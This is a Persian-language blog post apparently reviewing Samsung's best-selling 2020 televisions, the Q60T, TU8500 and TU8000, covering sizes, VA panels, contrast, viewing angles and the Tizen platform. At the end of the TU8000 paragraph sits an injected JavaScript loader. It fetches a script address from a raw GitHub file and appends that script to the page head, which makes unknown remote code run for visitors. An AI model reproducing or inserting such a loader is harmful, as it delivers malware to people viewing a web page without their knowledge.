دسته‌بندی نشده

لیست پرفروش ترین تلویزیون های 2020 از سامسونگ

تلویزیون QLED
Q60/Q60T

تلویزیون Q60T سامسونگ یکی از پرفروش ترین تلویزیون های سامسونگ تولید شده در سال 2020 می باشد. این تلویزیون 4K از خط تولیدی QLED میان رده این کمپانی است و محصولی فوق العاده پر طرفدار و پر فروش محسوب می شود. این تلویزیون در 8 سایز مختلف ارائه شده است بنابراین کاربردی بالا در محیط های مختلف با متراژ گوناگون دارد و می توان سایز های متنوع ان را برای اتاق های مختلف تهیه کرد. کوچک ترین سایز این تلویزیون 43 اینچ است که اندازه ای کوچک برای محیط های مانند اشپزخانه و یا به عنوان مانیتور استفاده می شود. سایز های 50 و 55 اینچ مناسب برای اتاق متوسط, 58 اینچ و 65 اینچ را می توان در محیط های نسبتا بزرگ استفاده کرد و سایز های 75,82 و 85 اینچ برای سالن های بزرگ بسیار مناسب می باشد. تلویزیون Q60T طراحی بی نظیری دارد حاشیه های این تلویزیون بسیار باریک است و پایه های ان به صورت دو شاخه ساخته شده است. این تلویزیون دارای پنل VA است بنابراین کنتراستی بالا دارد و دارای رنگ های مشکی عمیق می باشد. از نظر زاویه دید این تلویزیون مانند دیگر پنل های VA عملکردی ضعیف دارد. کنترل انعکاس روی این تلویزیون بسیار بی نظیر است و در اتاق های روشن و پر نور می تواند عملکردی مناسب داشته باشد. تصاویر در این تلویزیون به صورت 4K پخش می شود و همچنین محتویات رزولوشن پایین روی ان بدون مشکل و عیب و ایراد ارتقا داده می شود. این تلویزیون 2020 دارای پلتفرم تایزن است. استفاده از این پلتفرم بسیار اسان و روان است و اپلیکیشن های متنوعی روی ان قابل دانلود و اجرا می باشد. 

تلویزیون Crystal UHD
TU8500

تلویزیون کریستالی TU8500 سامسونگ سال 2020 در دو سایز 55 و 65 ارائه شده است. این تلویزیون طراحی زیبا و بسیار شیکی دارد. پایه این محصول در قسمت مرکزی ان قرار داد و دارای ارتفاع مناسبی می باشد. در این تلویزیون تصاویر با کیفیت 4K ارائه می شود و می تواند رزولوشن های پایین مانند 480p و 1080p را به بهترین شیوه ارتقا می دهد. با توجه به استفاده از پنل VA در این تلویزیون کنتراست بسیار بالایی ارائه می شود و رنگ های مشکی از عمق مناسبی برخوردار هستند. برای این تلویزیون قابلیت های گیمینگ مختلف و پیشرفته مانند ALLM و Game Motion Plus تعبیه شده است بنابراین بازی های مختلف روی ان قابل اجرا می باشد. تلویزیون TU8500 دارای قابلیت های اسمارت مختلف است. در این تلویزیون از پلتفرم تایزن با رنج گسترده ای از اپلیکیشن ها تعبیه شده است. بر روی این تلویزیون با استفاده از دستیار های صوتی امکان کنترل و انجام تنظیمات از طریق صدا فراهم می شود. 

تلویزیون Crystal UHD
TU8000

تلویزیون TU8000 محصولی میان رده از کمپانی سامسونگ تولید شده در سال 2020 می باشد. این تلویزیون دارای قیمت مناسب است بنابراین افراد مختلف می توانند به اسانی ان را تهیه کنند. این تلویزیون دارای 6 اندازه مختلف از کوچک به بزرگ می باشد. سایز های 43 اینچ, 50 و 55 اینچ برای محیط های کوچک و متوسط و سایز های 65 اینچ, 75 و 85 اینچ برای محیط های بزرگ و سالن های متراژ بالا استفاده می شوند. طراحی این تلویزیون بسیار زیبا و مشابه با تلویزیون Q60T انجام شده است. حاشیه های ان به صورت باریک با رنگ خاکستری تیره و پایه های ان به صورت دو شاخه دیزاین شده است. مانند دیگر پنل های VA در این تلویزیون نسبت کنتراست عالی ارائه می شود و رنگ های مشکی روی ان عمق بسیار زیادی دارند. زاویه دید این تلویزیون نا امید کننده است و تصاویر در قسمت های حاشیه ای ان دچار افت کیفیت می شوند. کنترل انعکاس TU8000 بسیار عالی است و استفاده از ان در محیط های روشن و در معرض تابش مستقیم نیز بلا مانع است. تصاویر روی نمایشگر تلویزیون 2020 با کیفیت فورکی ارائه می شوند و سایر رزوولوشن ها نیز روی ان به خوبی ارتقا داده می شوند. پلتفرم تایزن با کارکرد کاملا روان و شفاف روی تلویزیون اجرا می شود و اپلیکیشن های مختلفی نیز برای ان ها دانلود و قابل اجرا می باشند.  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *